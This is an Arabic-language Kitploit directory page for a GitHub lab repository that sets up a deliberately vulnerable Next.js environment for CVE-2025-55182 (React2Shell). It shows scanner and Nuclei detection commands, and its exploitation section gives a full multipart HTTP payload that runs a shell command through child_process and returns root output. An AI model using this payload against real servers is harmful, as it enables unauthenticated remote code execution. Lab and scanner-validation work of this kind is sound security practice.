Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Unihackers---CVE-2025-55182- — بيئة Next.js معرضة للخطر عمدًا مع PoC للاستغلال وقوالب كشف لـ CVE-2025-55182 (React2Shell RCE)، مما يتيح اختبار الأمان والتحقق من صحة الماسحات. | Kitploit
أدوات/GitHubGitHub/sairbo/unihackers---cve-2025-55182-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubsairbo/unihackers---cve-2025-55182-

Unihackers---CVE-2025-55182-

بيئة Next.js معرضة للخطر عمدًا مع PoC للاستغلال وقوالب كشف لـ CVE-2025-55182 (React2Shell RCE)، مما يتيح اختبار الأمان والتحقق من صحة الماسحات.

عرض المستودع
21منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عصابة إيطالية

React2Shell PoC

يوفر هذا المستودع بيئة صغيرة معرضة للخطر عمدًا لاختبار الماسحات الأمنية ضد ثغرة تنفيذ الأوامر عن بُعد الحرجة الأخيرة (React2Shell) التي تؤثر على مكونات خادم React و Next.js.

CVE-2025-55182: توجد ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في مكونات خادم React الإصدارات 19.0.0 و 19.1.0 و 19.1.1 و 19.2.0 بما في ذلك الحزم التالية: react-server-dom-parcel و react-server-dom-turbopack و react-server-dom-webpack. يقوم الكود المعرض للخطر بإلغاء تسلسل الحمولات من طلبات HTTP إلى نقاط نهاية وظائف الخادم بشكل غير آمن.

CVE-2025-66478: يتتبع التأثير النهائي على تطبيقات Next.js التي تستخدم App Router.

[!تحذير] هذا الإعداد معرض للخطر عمدًا ويجب ألا يتم تعريضه للإنترنت العام أو استخدامه في الإنتاج أبدًا.


ما هذا

هذا التطبيق هو مشروع Next.js صغير جدًا يقوم بـ:

  • تثبيت الإصدارات المعرضة للخطر من:
    • next: 16.0.6
    • react: 19.2.0
  • react-dom: 19.2.0
  • استخدام إعداد NextJS بسيط مع App Router و React server actions
  • [!نصيحة] تثبيت react و react-dom هو اختياري، حيث أن إصدار next المتأثر يكون عرضة للخطر افتراضيًا بسبب App Router.

    كيفية التشغيل

    root@kitploit:~
    docker run --rm -p 127.0.0.1:3000:3000 ghcr.io/l4rm4nd/cve-2025-55182:latest
    

    كيفية الكشف

    ماسح AssetNote

    استخدم الماسح الذي توفره AssetNote:

    root@kitploit:~
    git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
    virtualenv venv && source venv/bin/activate && pip install -r requirements.txt
    
    python3 scanner.py -u http://127.0.0.1:3000
    

    سيعيد:

    root@kitploit:~
    ╰─(venv) ⠠⠵ python3 scanner.py -u http://127.0.0.1:3000             
    
    brought to you by assetnote
    
    [*] Loaded 1 host(s) to scan
    [*] Using 10 thread(s)
    [*] Timeout: 10s
    [*] Using RCE PoC check
    [!] SSL verification disabled
    
    [VULNERABLE] http://127.0.0.1:3000 - Status: 303
    

    Nuclei

    root@kitploit:~
    nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000
    

    سيعيد:

    root@kitploit:~
    [INF] Templates loaded for current scan: 1
    [WRN] Loading 1 unsigned templates for scan. Use with caution.
    [INF] Targets loaded for current scan: 1
    [CVE-2025-55182] [http] [critical] http://127.0.0.1:3000
    

    كيفية الاستغلال

    حمولة PoC HTTP من هنا.

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: b5dce965
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
    Content-Length: 740
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"
    
    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    
    

    سيعيد:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    x-nextjs-cache: HIT
    x-nextjs-prerender: 1
    Content-Type: text/x-component
    Date: Fri, 05 Dec 2025 11:53:05 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
    Content-Length: 195
    
    0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
    1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}
    
    
    image
    تنزيل الأداة